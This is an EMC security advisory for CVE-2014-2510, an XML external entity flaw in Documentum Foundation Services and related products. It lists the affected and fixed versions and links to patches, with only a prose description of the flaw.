provided as is without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Product Security Response Center security_al...@emc.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlO64voACgkQtjd2rKp+ALyPuACgxtfoIFxBqHeyFVi0eNwQA428 NaEAoKzmD8WcINVBGj/CYul8UON+Osyr =wzFw -END PGP SIGNATURE-
ESA-2014-057: EMC Documentum Foundation Services (DFS) XML External Entity (XXE) Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2014-057: EMC Documentum Foundation Services (DFS) XML External Entity (XXE) Vulnerability EMC Identifier: ESA-2014-057 CVE Identifier: CVE-2014-2510 Severity Rating: CVSS v2 Base Score: 8 (AV:N/AC:L/Au:S/C:C/I:P/A:P) Affected products: EMC DFS 6.6 all service packs and patch versions prior to P39 EMC DFS 6.7 SP1 all patch versions prior to P28 EMC DFS 6.7 SP2 all patch versions prior to P15 EMC My Documentum for Desktop 6.7.2 EMC My Documentum for Microsoft Outlook 6.7SP1, 6.7SP2, 6.7.3 6.7.1 EMC CenterStage 1.2SP1 and 1.2SP2 Summary: EMC DFS may be vulnerable to XML External Entity (XXE) vulnerability which can be potentially leveraged by a malicious authenticated user to compromise the affected system. Details: EMC DFS may be vulnerable to XXE vulnerability due to the way the JAXB XML parser handles the incoming XML from an authenticated user. This can be potentially leveraged by a malicious authenticated user to inject malicious data in the XML and retrieve information from sensitive files on the system. This may also be potentially leveraged to affect the Integrity and Availability of the system. Resolution: The following products contain the resolution to this issue: EMC DFS 6.6 P39 and later EMC DFS 6.7 SP1 P28 and later EMC DFS 6.7 SP2 P15 and later EMC My Documentum for Desktop 6.7.2P15 and later EMC My Documentum for Microsoft Outlook 6.7SP1P28, 6.7SP2P15, 6.7.1P29, 6.7.3 (Hotfix) EMC CenterStage 1.2SP2P06 , 1.2SP1 (HotFix) EMC recommends all customers upgrade to the fixed versions listed above at the earliest opportunity. Link to remedies: Customers can download using the links below for respective products: EMC DFS 6.6: https://emc.subscribenet.com/control/dctm/download?element=2808763 EMC DFS 6.7 SP2: https://emc.subscribenet.com/control/dctm/download?element=4544131 EMC DFS 6.7 SP1 https://emc.subscribenet.com/control/dctm/download?element=3812321 My Documentum for Microsoft Desktop 6.7.2: https://emc.subscribenet.com/control/dctm/download?element=4300661 My Documentum for Microsoft Outlook 6.7SP1: https://emc.subscribenet.com/control/dctm/download?element=3832891 My Documentum for Microsoft Outlook 6.7SP2: https://emc.subscribenet.com/control/dctm/download?element=4544671 My Documentum for Microsoft Outlook 6.7.1: https://emc.subscribenet.com/control/dctm/download?element=4194721 My Documentum for Microsoft Outlook 6.7.3: (hot fix) For the My Documentum for Microsoft Outlook 6.7.3 hot fix contact EMC Support CenterStage 1.2SP1 (hot fix) https://emc.subscribenet.com/control/dctm/download?element=3686131 CenterStage 1.2SP2 : https://emc.subscribenet.com/control/dctm/download?cert_num=90816713element=4880201 Credits: EMC would like to thank Lukasz Plonka for reporting this issue. Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Product Security Response Center security_al...@emc.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlO64swACgkQtjd2rKp+ALyvvQCcCEZV0CM/NzXz61M+34IX+PzQ JdMAn3Plqm5HPvFz7CfgPDX4iOo8xj0U =ED+0 -END PGP SIGNATURE-
